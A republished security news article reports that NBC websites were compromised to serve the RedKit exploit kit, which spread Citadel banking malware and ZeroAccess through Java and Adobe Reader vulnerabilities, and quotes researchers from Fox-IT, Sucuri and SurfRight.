NBC Websites Hacked To Serve Citadel Financial Malware

  /     /     /  
Publicated : 22/11/2024   Category : security


NBC Websites Hacked To Serve Citadel Financial Malware


RedKit exploit kit launched drive-by malware attacks from NBC websites, targeted vulnerabilities in Java and Adobe Reader.



Multiple NBC websites were compromised by online attackers and used to launch drive-by attacks at visitors Thursday.
At 16:43 CET [12:43 EST] this afternoon we noticed that the NBC.com website links to the redkit exploit kit that is spreading Citadel malware, targeting U.S. financials (sic) institutions,
warned security analyst Barry Weymes
at Dutch security firm Fox-IT in a Thursday blog post. This version of Citadel is only recognizable by 3 out of the 46 antivirus programs on
virustotal.com
.
Malware-spewing NBC websites
included the sites for
Late Night with Jimmy Fallon
and
Jay Lenos Garage
, according to a blog posted by Tony Perez, COO of security software vendor Sucuri.
In short order, Google was blocking some NBC websites from search results, warning that they appeared to be infected with malware. While some reports suggested that NBC expunged the malware after just 15 minutes, multiple security researchers reported that the infections persisted for at least four hours.
[ Attend
Interop Las Vegas
, May 6-10, and get the most thorough training on Apple Deployment at the NEW Mac & iOS IT Conference. Use Priority Code DIPR02 by March 2 to save up to $500. ]
Attackers appeared to have compromised the NBC websites using the
RedKit attack toolkit
, which then targeted users with attacks designed to exploit vulnerabilities in their Java browser plug-in, or
Adobe Reader
. The
remotely exploitable Java bug
(CVE-2013-0422) being targeted was discovered in January and
patched last month
. Meanwhile, the malicious PDF file served up by the malware was recognized Friday morning by only six out of 46 antivirus software packages,
according to VirusTotal
. Initial reports on the attack from security researchers didnt disclose if the Adobe Reader bug was a zero-day flaw, or previously discovered bug.
The iframe used in the attack called on an ever-changing list of external URLs to load attack code. This tells us that something on the server is generating the payload, said Sucuris Perez in his Thursday blog post. This isnt an uncommon practice, it also tells us that the script is likely still on the box. The fact that its impacting other sites tells us that the compromise might extend beyond the Web application and onto the server. If those other sites are stored on separate boxes then were looking at a much bigger, network, compromise, but that is speculative at the moment.
By infecting a high-profile site such as NBC.com, which is one of the
top 600 most popular sites
in the United States, attackers had the opportunity to quickly infect numerous visitors. Targeting media and news websites can vastly improve an attackers chances of success, according to Fox-ITs Weymes, which was one of the first organizations to
spot the attack
. Users presume these large organizations websites to be free from malware. If an attacker can gain access to these Web servers, they can use them to distribute malware to every visitor of that Web server.
Attackers made the most of their exploit window, using RedKit to target PCs with up to three different exploit kits, including the
Citadel crimeware toolkit
, which is designed to steal financial information. According to Fox-IT, the attackers were targeting account details for numerous U.S. financial institutions, including American Express, Bank of America, Chase, Citibank, Citizensbank Online, Fifth Third Bank, Navy Federal Credit Union, PNC, Schwab, Suntrust, TD Ameritrade, USAA and Wells Fargo.
The drive-by NBC website attacks also infected some visitors with
ZeroAccess malware
, which is used to launch
clickjacking attacks
that generate fake pay-per-click revenues for botnet controllers or their clients. ZeroAccess is a dangerous threat that uses stealth techniques in order to hinder its detection and removal,
said SurfRight security researcher Erik Loman
in a blog post.
RedKit served up a third piece of malware which has yet to be identified. Some antivirus vendors identify this malware as Zbot or a rootkit ... but it is most definitely not Zbot and its not a rootkit either, Loman said. The malware binary has a curious name at the end SadokBdi, which may connect it to previously seen malware known as Sadok.
The timing of the high-profile NBC attack may be tied to Oracle and Adobe having recently released patches for multiple critical vulnerabilities in Java, Reader and Acrobat. Once vendors release a patch, criminals often reverse-engineer the fix to reveal the underlying vulnerability, which they then begin targeting. Anyone who doesnt quickly update their software thus remains highly vulnerable to having their PC compromised by an attacker, which can lead to their personal financial account information being stolen, keystrokes recorded and their PC being made to serve as part of a
botnet
.
Owing to many users
failing to update
the Java Runtime Environment installed on their PCs,
Java bugs in particular
remain quite popular with -- and effective for -- attackers.

Last News

▸ Senate wants changes to cybercrime law. ◂
Discovered: 23/12/2024
Category: security

▸ Car Sector Speeds Up In Security. ◂
Discovered: 23/12/2024
Category: security

▸ Making use of a homemade Android army ◂
Discovered: 23/12/2024
Category: security


Cyber Security Categories
Google Dorks Database
Exploits Vulnerability
Exploit Shellcodes

CVE List
Tools/Apps
News/Aarticles

Phishing Database
Deepfake Detection
Trends/Statistics & Live Infos



Tags:
NBC Websites Hacked To Serve Citadel Financial Malware